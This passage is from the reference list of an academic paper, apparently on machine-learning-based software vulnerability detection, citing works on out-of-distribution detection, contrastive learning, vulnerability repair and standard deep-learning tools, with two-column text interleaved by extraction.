Le, C. Tantithamthavorn, J. Grundy, H. Nguyen, [26] K. Lee, K. Lee, H. Lee, and J. Shin, “A simple unified framework S. Camtepe, P. Quirk, and D. Phung, “An information-theoretic and for detecting out-of-distribution samples and adversarial attacks,” The contrastive learning-based approach for identifying code statements NeuralInformationProcessingSystems(NeurIPS),2018. causingsoftwarevulnerability,”CoRR,vol.abs/2209.10414,2022. [27] V.Sehwag,M.Chiang,andP.Mittal,“Ssd:Aunifiedframeworkforself- [50] V. Nguyen, T. Le, C. Tantithamthavorn, J. Grundy, H. Nguyen, and supervisedoutlierdetection,”TheInternationalConferenceonLearning D. Phung, “Cross project software vulnerability detection via domain Representations(ICLR),2021. adaptation and max-margin principle,” CoRR, vol. abs/2209.10406, [28] Y. Sun, Y. Ming, X. Zhu, and Y. Li, “Out-of-distribution detection 2022. withdeepnearestneighbors,”TheInternationalConferenceonMachine [51] M. Fu, C. Tantithamthavorn, V. Nguyen, and T. Le, “Chatgpt for Learning(ICML),2022. vulnerabilitydetection,classification,andrepair:Howfararewe?”The [29] J. Ren, P. J. Liu, E. Fertig, J. Snoek, R. Poplin, M. A. DePristo, Asia-PacificSoftwareEngineeringConference(APSEC),2023. J. V. Dillon, and B. Lakshminarayanan, “Likelihood ratios for out- [52] M.Fu,T.Le,V.Nguyen,C.Tantithamthavorn,andD.Phung,“Learning of-distribution detection,” The Neural Information Processing Systems to quantize vulnerability patterns and match to locate statement-level (NeurIPS),2019. vulnerabilities,”CoRR,vol.abs/2306.06109,2023.
14[53] M.Fu,V.Nguyen,C.Tantithamthavorn,D.Phung,andT.Le,“Vision [77] N.Srivastava,G.Hinton,A.Krizhevsky,I.Sutskever,andR.Salakhut- transformer-inspiredautomatedvulnerabilityrepair,”TheACMTransac- dinov, “Dropout: Asimple wayto prevent neuralnetworks fromover- tionsonSoftwareEngineeringandMethodology,2023. fitting,”TheJournalofMachineLearningResearch,vol.15,pp.1929– [54] M. Fu, C. Tantithamthavorn, T. Le, V. Nguyen, and D. Phung, “Vul- 1958,2014. repair: A t5-based automated software vulnerability repair,” The ACM [78] M. Abadi, P. Barham, J. Chen, Z. Chen, A. Davis et al., “Tensorflow: Joint European Software Engineering Conference and Symposium on A system for large-scale machine learning,” The USENIX Symposium theFoundationsofSoftwareEngineering(ESEC/FSE),2022. onOperatingSystemsDesignandImplementationOSDI,pp.265–283, [55] Z.Feng,D.Guo,D.Tang,N.Duan,X.Feng,M.Gong,L.Shou,B.Qin, 2016. T. Liu, D. Jiang, and M. Zhou, “Codebert: A pre-trained model for [79] A. Paszke, S. Gross, F. Massa, A. Lerer, J. Bradbury, G. Chanan, programmingandnaturallanguages,”CoRR,vol.abs/2002.08155,2020. T.Killeen,Z.Lin,N.Gimelshein,L.Antiga,A.Desmaison,A.Ko¨pf, [56] A.Vaswani,N.Shazeer,N.Parmar,J.Uszkoreit,L.Jones,A.N.Gomez, E.Z.Yang,Z.DeVito,M.Raison,A.Tejani,S.Chilamkurthy,B.Steiner, L.Kaiser,andI.Polosukhin,“Attentionisallyouneed,”TheConference L. Fang, J. Bai, and S. Chintala, “Pytorch: An imperative style, high- onNeuralInformationProcessingSystems(NIPS),2017. performancedeeplearninglibrary,”CoRR,vol.abs/1912.01703,2019. [57] E. Jang, S. Gu, and B. Poole, “Categorical reparameterization with [80] L. V. D. Maaten and G. Hinton, “Visualizing data using t-SNE,” The gumbel-softmax,”CoRR,vol.abs/1611.01144,2016. JournalofMachineLearningResearch,vol.9,pp.2579–2605,2008. [58] C. J. Maddison, A. Mnih, and Y. W. Teh, “The concrete distribution: A continuous relaxation of discrete random variables,” CoRR, vol. abs/1611.00712,2016. [59] J. Chen, L. Song, M. J. Wainwright, and M. I. Jordan, “Learning to explain:Aninformation-theoreticperspectiveonmodelinterpretation,” CoRR,vol.abs/1802.07814,2018. [60] C.E.Shannon,“Themathematicaltheoryofcommunication.” Warren Weaver.TheUniversityofIllinoisPress,Urbana,1998. [61] T.M.CoverandJ.A.Thomas,“Elementsofinformationtheory.” John WileyandSons,Inc.,2006. [62] N. Jethani, M. Sudarshan, Y. Aphinyanaphongs, and R. Ranganath, “Have we learned to explain?: How interpretability methods can learn to encode predictions in their interpretations,” The International Con- ferenceonArtificialIntelligenceandStatistics(AISTATS),2021. [63] TensorFlowAPI. (2023) Relaxedbernoulli. [Online]. Available: https://www.tensorflow.org/probability/api docs/python/ tfp/distributions/RelaxedBernoulli [64] P. Khosla, P. Teterwak, C. Wang, A. Sarna, Y. Tian, P. Isola, A.Maschinot,C.Liu,andD.Krishnan,“Supervisedcontrastivelearn- ing,”CoRR,vol.abs/2004.11362,2020. [65] M. Kim, J. Tack, and S. J. Hwang, “Adversarial self-supervised contrastive learning,” The Neural Information Processing Systems (NeurIPS),vol.33,pp.2983–2994,2020. [66] W. Wang, T. Zhou, F. Yu, J. Dai, E. Konukoglu, and L. Van Gool, “Exploringcross-imagepixelcontrastforsemanticsegmentation,”The IEEE/CVF International Conference on Computer Vision (ICCV), pp. 7303–7313,October2021. [67] B. Sun, B. Li, S. Cai, Y. Yuan, and C. Zhang, “Fsce: Few-shot object detectionviacontrastiveproposalencoding,”TheIEEE/CVFConference on Computer Vision and Pattern Recognition (CVPR), pp. 7352–7362, June2021. [68] Y.Du,F.Wei,Z.Zhang,M.Shi,Y.Gao,andG.Li,“Learningtoprompt foropen-vocabularyobjectdetectionwithvision-languagemodel,”The IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR),pp.14084–14093,June2022. [69] P. Wang, K. Han, X.-S. Wei, L. Zhang, and L. Wang, “Contrastive learning based hybrid networks for long-tailed image classification,” TheIEEE/CVFConferenceonComputerVisionandPatternRecognition (CVPR),pp.943–952,June2021. [70] D.P.KingmaandJ.Ba,“Adam:Amethodforstochasticoptimization,” CoRR,vol.abs/1412.6980,2014. [71] Y. Chen, Z. Ding, L. Alowain, X. Chen, and D. Wagner, “Diversevul: Anewvulnerablesourcecodedatasetfordeeplearningbasedvulnera- bilitydetection,”TheInternationalSymposiumonResearchinAttacks, IntrusionsandDefenses(RAID),2023. [72] M.Brunsfeld,A.Hlynskyi,P.Thomson,A.Qureshietal.(2017)Tree- sitter.https://tree-sitter.github.io/tree-sitter/. [73] J. Tack, S. Mo, J. Jeong, and J. Shin, “CSI: novelty detection via contrastive learning on distributionally shifted instances,” CoRR, vol. abs/2007.08176,2020.